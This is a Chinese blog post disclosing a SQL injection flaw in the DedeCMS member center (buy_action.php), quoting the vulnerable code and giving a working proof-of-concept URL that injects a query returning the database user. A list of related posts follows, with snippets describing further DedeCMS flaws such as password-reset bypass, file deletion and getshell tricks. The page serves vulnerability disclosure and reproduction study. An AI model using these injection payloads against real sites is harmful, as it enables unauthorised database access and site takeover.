Dedecms会员中心注入漏洞

最新推荐文章于 2024-03-13 21:23:03 发布
最新推荐文章于 2024-03-13 21:23:03 发布
阅读量578 收藏
点赞数
文章标签: php
详细说明:
member/buy_action.php
 
require_once(dirname(__FILE__)."/config.php");
 
CheckRank(0,0);
 
$menutype = 'mydede';
 
$menutype_son = 'op';
 
require_once DEDEINC.'/dedetemplate.class.php';
 
 
 
$product = isset($product) ? trim($product) : '';
 
$mid = $cfg_ml->M_ID;
 
$ptype = '';
 
$pname = '';
 
$price = '';
 
$mtime = time();
 
省略XX行
 
if(empty($product))
 
{
 
    ShowMsg("请选择一个产品!", 'javascript:;');
 
    exit();
 
}
 
省略xxx行
 
=if(!isset($paytype))
 
{    
 
    $inquery = "INSERT INTO #@__member_operation(`buyid` , `pname` , `product` , `money` , `mtime` , `pid` , `mid` , `sta` ,`oldinfo`)
 
   VALUES ('$buyid', '$pname', '$product' , '$price' , '$mtime' , '$pid' , '$mid' , '0' , '$ptype');//product没有过滤
 
    ";
 
echo  $inquery."<br>" ;
漏洞证明:
测试方法
 
注册用户之后验证邮箱完了之后 打开
 
127.0.0.1/dedecms/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
 
然后在http://127.0.0.1/dedecms/member/operation.php
 
就可以查看到返回信息了
weixin_33721344
关注
Dedecms 最新版漏洞收集并复现学习
墨痕诉清风的博客
09-30 5472
在用户密码重置功能处,php存在弱类型比较,导致如果用户没有设置密保问题的情况下可以绕过验证密保问题,直接修改密码(管理员账户默认不设置密保问题)。这么一次过滤,直接粗暴的将一些特殊字符替换为空,那么我们就可以通过特殊字符绕过上面的全局文件名不能包含php字符的限制,比如文件名为。这样,由于index.php中我们可以控制返回一个输值和这个输值经过服务器处理后的md5值。我们可以看到当uid存在值时就会进我们现在的代码中,当cookie中的last_vid中不存在值为空时,就会将uid值赋予过去,
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
m0_60466340的博客
11-28 704
漏洞概述 1.漏洞简介 织梦内容管理系统(DedeCms),以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关...
dedecms会员中心mtypes.php注入漏洞修复方法
kakashs
01-15 1060
路径:/member/mtypes.php编辑mtypes.php,找到如下代码: elseif ($dopost == 'save') { if(isset($mtypeidarr) &amp;&amp; is_array($mtypeidarr)) { $delids = '0'; $mtypeidarr = array_filter($mtyp...
member pm.php,Dedecms 会员中心注入漏洞5
weixin_31995251的博客
04-09 134
漏洞作者: Matt[php]member/pm.phpelse if($dopost=='read'){$sql = "SELECT * FROM `#@__member_friends` WHERE mid='{$cfg_ml->M_ID}' AND ftype!='-1' ORDER BY addtime DESC LIMIT 20";$friends = array();$dsq...
dedecms会员注册注入漏洞
weixin_33912453的博客
03-30 364
一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)二、然后访问“/member/ajax_membergroup.php?action=post&amp;membergroup=1”页面 看是否可注入三、爆用户:/member/ajax_membergroup.php?action=post&amp;memb...
阿里云提示织梦DedeCMS v5.7 注册用户任意文件删除漏洞
PHP错误汇总
12-27 206
阿里云服务器提示织梦DedeCMS v5.7 注册用户任意文件删除漏洞,今天秀站网技术讲解下解决办法。 漏洞简介:dedecms前台任意文件删除(需要会员中心),发表文章处,对于编辑文章的时候图片参数处理不当,导致了任意文件删除。 漏洞文件:/member/inc/archives_check_edit.php 漏洞描述:注册会员用户可利用此漏洞任意删除网站文件。 修复方法: 打开/member/inc/archives_check_edit.php 找到大概第92行的代码: .
DedeCms织梦系统漏洞复现
LIU6636LIU的博客
03-13 2057
1 部署好之后发现系统默认管理路径是dede,登陆管理后台可以通过地址然后有dedecms安全提示直接打开根目录修改dede文件夹为LYP重新进去管理员后台对数据进行还原看一下网站的地址接着生成新的网站然后即可访问网站,CMS搭建完毕首先打开后台管理页面开启会员功能这样就可以注册一个账户。
DedeCMS 存储型xss漏洞1
08-03
在本文中,我们将深探讨一个特定的存储型 XSS(跨站脚本)漏洞,该漏洞存在于DedeCMS 的会员功能组件 `shops_delivery.php` 中的 `des` 参数。 ### 漏洞概述 这个存储型 XSS 漏洞允许攻击者通过注入恶意脚本到 `...
织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞
weixin_42104947的博客
03-10 515
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.Hackme论坛原创 转载请附带原文链接作者: c4rp3nt3r@0x50sec.orgDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.算了不公开了,不能糟蹋0day了.传送门 DedeCmS V57 p...
对某 DedeCMS 二开系统全局变量追加漏洞利用1
08-04
DedeCMS历史上确实存在多起注入漏洞,因此这是一个合理的研究方向。 文章提到,开发团队将DedeCMS的重要目录"data"移动到了Web目录之外,同时删除了"plus"文件夹中的大部分文件,这使得许多常见的漏洞利用方式失效...
DeDeCMS前台任意用户密码修改漏洞复现
Coffilater的博客
12-01 3104
一、漏洞概述 1.漏洞简介 织梦内容管理系统(DedeCms)的前台任意用户密码修改漏洞,被Seebug 漏洞平台[3]收录该漏洞漏洞编号为 SSV-97074。 2.漏洞限制 1、 只影响前台账户 2、 只能修改未设置安全问题的账户 3.影响版本 DeDeCMSV5.7SP2 正式版(2018-01-09) 二、漏洞复现 1.复现环境 PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 2.复现过程及结果 (一)搭建网站,这里用的.
dedecms前台任意用户名漏洞复现
wow_iamfree的博客
10-31 288
漏洞说明: 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS 前台任意用户密码修改漏洞的细节[2]。 2018 年 1 月 10 日,Seebug 漏洞平台[3]收录该漏洞漏洞编号为 SSV-97074,知道创宇 404 漏洞应急团队成功复现该漏洞。 形成原因: 由于php弱类型比较形成绕过 限制: 只影响前台账户 只能修改未设置安全问题的账户 漏洞复现: 先搭建好漏洞环境官网链接,试了一下5.6和5.7版本都存在这一漏洞。 先注册一个账号,不设置任何安全
关于DEDE GETSHELL漏洞的另类 提交方法
weixin_33736048的博客
12-17 96
转自t00ls 在搞一个DEDE站的时候,那个是最新版本的在上传图片的时候被加上了万恶的水印,被加上水印之后就这个PP就废了 解决办法: 1、修改后缀为SWF格式,把mediatype 的ID改成2 (1貌似是图片的格式,2是SWF的格式 <form action="/member/uploads_edit.php" method="post" ...
dedecms xss 0day通杀所有版本 可getshell
oceanark的博客
07-13 1773
////////////////////////////////////////////////漏洞虽老,但方法永远不会过时//////////////////////////////////////////////// 漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起
dedecms数据库表说明大全
小道士写程序
02-02 1348
1、dede_addonarticle:附加文章表 表名:dede_addonarticle (ENGINE=MyISAM/CHARSET=utf8)说明:附加文章表 字段名说明描述具体参数 aid文章IDmediumint(8) unsigned NOT NULL default '0' typeid栏目IDsmallint(5) unsigned NOT NULL default '0' body内容mediumtext redirecturl跳转URLva...
DeDecms(织梦CMS)最新版任意用户密码重置漏洞分析
3569
01-11 1万+
http://docs.ioin.in/writeup/xianzhi.aliyun.com/_forum_topic_1926/index.html DeDecms(织梦CMS) V5.7.72 正式版20180109 (最新版) 由于前台resetpassword.php中对接受的safeanswer参数类型比较不够严格,遭受弱类型比较攻击 导致了远程攻击者可以在前台会员中心绕过
dedecms v5.7(build 20150618)的12个漏洞
热门推荐
ccfxue的博客
06-28 1万+
一打开阿里云后台,发现了12个加急处理的漏洞,还没来得及了解阿里云的漏洞检测原理,直接开始着手修复漏洞searching on baidu... ...  : )1.dedecms支付模块注入漏洞 描述:DEDECMS支付插件存在SQL注入漏洞,此漏洞存在于/include/payment/alipay.php文件中,对输参数$_GET['out_trade_no']未进行严格过滤。解决:找到 ...
DedeCMS v5.7 注册用户任意文件删除漏洞 /member/inc/archives_check_edit.php
qq_31763129的博客
04-26 2047
漏洞名称:DedeCMS v5.7 注册用户任意文件删除漏洞  危险等级:★★★★★(高危)  漏洞文件:/member/inc/archives_check_edit.php  披露时间:2017-03-20  漏洞描述:注册会员用户可利用此漏洞任意删除网站文件。  修复方法:  打开/member/inc/archives_check_edit.php  找到大概第92行的代码:$litpic...
织梦漏洞
showso2006的专栏
09-06 1020
<br />最近网站被人挂马,360狂报,真的很影响网站形象。<br />经检查,原来是织梦的模板机制漏洞,只要利用织梦的会员管理功能,发表文章,上传一个带有gif89a的欺骗图片,再访问那篇文章即可以执行脚本代码。然后实现上传木马脚本到网站,就可以为所欲为。<br /> <br />另外,即使你清除了木马,用360检查还是会报警的,只有等360再次检查时发现没问题,才会清除报警。如果要快,可以使用360的验证码嵌到网站,登录自己的账号,点击验证,大概需要在半小时之后才会再次检查。
dedecms sql注入漏洞
最新发布
06-28
Dedecms SQL注入漏洞是指在Dedecms系统中存在的一种安全漏洞,攻击者可以通过该漏洞向数据库中注入恶意代码,从而实现对网站的攻击和控制。该漏洞主要是由于Dedecms系统中的parse_str函数存在变量覆盖问题,攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值